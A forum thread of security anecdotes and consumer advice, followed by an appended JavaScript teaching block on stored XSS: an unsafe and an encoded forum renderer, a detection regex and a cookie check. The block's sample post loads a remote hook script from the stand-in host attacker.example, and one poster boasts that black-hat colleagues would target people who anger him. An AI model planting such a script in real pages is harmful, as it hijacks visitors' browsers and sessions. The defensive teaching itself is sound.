
My life in IT Security - a review of 1500+ customer organizations


Akula


I have talked to less than 10 organizations that have good, focused security teams.

 

I have talked to less than 2 banks that focus on security, and do it well.

 

Most of the IT Security people at organizations you actually do business with have IT Security titles but are project managers.

 

I cannot unlearn how poorly security is treated, even after the Sony breach hit the market.

 

If you bank, use credit cards for anything, or use any social networking, you will be losing your PII, I promise.

 

PII has about 15x the value of a single credit card number now, it isn't about credit cards anymore.

 

On the flip side, exploits are easier. BackTrack anyone?


Off topic-ish, do you know a guy named Bruce Schneier? He's a security guy that parlayed his experiences into other areas away from IT.

 

I know of him, read some of his stuff. I attend these little meetings like BSides and stuff at the Hacker Dojo with guys like Billy Rios or Ivan Ristic.

 

I am teaching classes again at Black Hat this year but even Black Hat has become a CIO road-show like RSA.


I'm in security. I agree, no one knows what the fuck they are doing. I do more sustainment of our security tools than analysis of useful data. I'd like to get into writing signatures and checking out incidents.

 

Fuzzing is like NASCAR, you only do it for the crashes.

 

We have 11000+ signatures, no point in reinventing the wheel.

 

Most of our R&D guys fuzz, write an exploit, publish to our KB, repeat. Seems kinda boring really.


So I should withdraw all of my money and move to Australia?

 

Your money is safe-ish. I don't know about withdrawing it all, but you should avoid using your credit card at mom-and-pop places.

 

You should never, EVER use the same password for Facebook as you do for your bank.

 

Stop using tabbed browsing; in fact, use more than one browser, and use one for surfing and one for banking.

 

Hosts file entries for credit cards, E*TRADE and banks.

 

Log out, for crying out loud, LOG OUT; don't just close the tab.



You mean like IE for pron, and Firefox for paying for the Fleshlight?

 

P.S. Serious question muddled by played-out internet humor.


I would never use IE, but you get the idea. You never want to have your bank website up and any other website up in the same browser, or a session hijack can occur. Then you need to LOG OUT of your bank's site.

Wow, you're a geek.

 

Thanks.

 

I am also concerned with the bad things that happen out there. 350% increase in security incidents in the last year. Sony's pay service down for a month, seriously, a freaking month!!!!?

 

It is so easy to exploit systems now that I don't think you even need to understand the underlying technology.

 

Attack and Defense Labs makes this great toy called Shell of the Future that should scare the crap out of everyone.


I know absolutely NOTHING about IT stuff, so forgive me when I ask a dumb question like: is it possible to track down the people that do this shit? They ought to hang them by the balls.

 

Yes, the ones that aren't good at it are easy to find. The good ones use open proxies to hide their identity.


Note to self, never piss off Jason. He can fuck up your world.

 

Good info man.

 

Most of the guys I work with are black hats in some way; if you piss me off I just have them work on it. They are bored most days.


 

Attack and Defense Labs makes this great toy called Shell of the Future that should scare the crap out of everyone.

 

I googled, read, did not understand. Can you give me cliffs in layman's terms?


I put some malicious code on a web page, say on a forum that is allowing script tagging. Your browser executes the code and your computer pops up on the console I have running as a new target. I then copy your hard drive to mine, or watch you log into your bank and capture the HTTP headers so I get your passwords, or what have you.

 

If you want some good "hacking" tools, go to http://www.getmantra.com/tools/ or just download BackTrack.

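The two posts above (same-browser session hijack, and a script planted in a forum post that hands the victim's browser to an attacker's console) describe stored XSS leading to session riding. The block below is an added example, not code from the thread or from Attack and Defense Labs' Shell of the Future: it shows the vulnerable forum renderer beside the output-encoded fix, a reviewer check for surviving active content, and which cookies injected script could read directly. The attacker URL, post text and cookie headers are constructed for the example.

```javascript
// Added example: stored XSS in a forum post and the output-encoding fix.
// Not from the original thread or from Attack and Defense Labs; the
// attacker URL, post body and cookie headers below are constructed.

// Output-encode untrusted text before placing it into an HTML body context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable renderer: the post body is concatenated straight into the page,
// which is what "a forum that is allowing script tagging" amounts to.
function renderPostUnsafe(author, body) {
  return `<div class="post"><b>${author}</b>: ${body}</div>`;
}

// Hardened renderer: every untrusted field is encoded for HTML body context.
function renderPostSafe(author, body) {
  return `<div class="post"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Reviewer heuristic over rendered HTML: does a <script> tag or an inline
// event handler attribute survive in the output? (A detection aid for tests,
// not a sanitizer.)
function containsActiveContent(html) {
  return /<script\b|\bon[a-z]+\s*=/i.test(html);
}

// Which cookies would injected script see through document.cookie? Only those
// set without HttpOnly. Caveat: a shell proxied through the victim's browser
// still sends HttpOnly cookies on every request it makes, so HttpOnly limits
// cookie theft but does not stop session riding while the victim is logged in.
function cookiesVisibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter(h => !/;\s*HttpOnly\b/i.test(h))
    .map(h => h.split(';')[0].split('=')[0].trim());
}

// Constructed sample: a post that loads a remote hook script (hypothetical URL).
const maliciousPost = '<script src="http://attacker.example/hook.js"></script>';

// Constructed sample Set-Cookie headers: one session cookie with HttpOnly,
// one convenience cookie without it.
const sampleCookies = [
  'PHPSESSID=3f1c9a; Path=/; HttpOnly',
  'remember_me=abc123; Path=/',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderPostUnsafe('guest', maliciousPost));  // script tag reaches the page
  console.log(renderPostSafe('guest', maliciousPost));    // rendered as inert text
  console.log(cookiesVisibleToScript(sampleCookies));     // only remember_me
}
```

Run it with `node` to see the two renderings side by side. The fix is context-specific encoding at output time; the HttpOnly note is why the thread's advice to use a separate browser for banking and to actually log out still matters even when the session cookie itself cannot be read by script.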
